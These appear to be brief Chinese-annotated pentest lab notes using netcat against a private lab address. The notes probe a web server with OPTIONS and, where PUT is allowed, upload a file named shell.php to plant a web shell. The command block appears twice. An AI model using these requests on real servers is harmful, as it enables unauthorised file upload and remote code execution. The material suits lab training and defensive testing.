nc 192.168.56.111 80
OPTIONS /test/ HTTP/1.1
Host: 192.168.56.111
#double return
在返回的ALLOW字段里面,如果有PUT,表示可以上传任意文件。
nc 192.168.56.111 80
PUT /test/shell.php HTTP/1.1
Host: 192.168.56.111
nc 192.168.56.111 80
OPTIONS /test/ HTTP/1.1
Host: 192.168.56.111
#double return
在返回的ALLOW字段里面,如果有PUT,表示可以上传任意文件。
nc 192.168.56.111 80
PUT /test/shell.php HTTP/1.1
Host: 192.168.56.111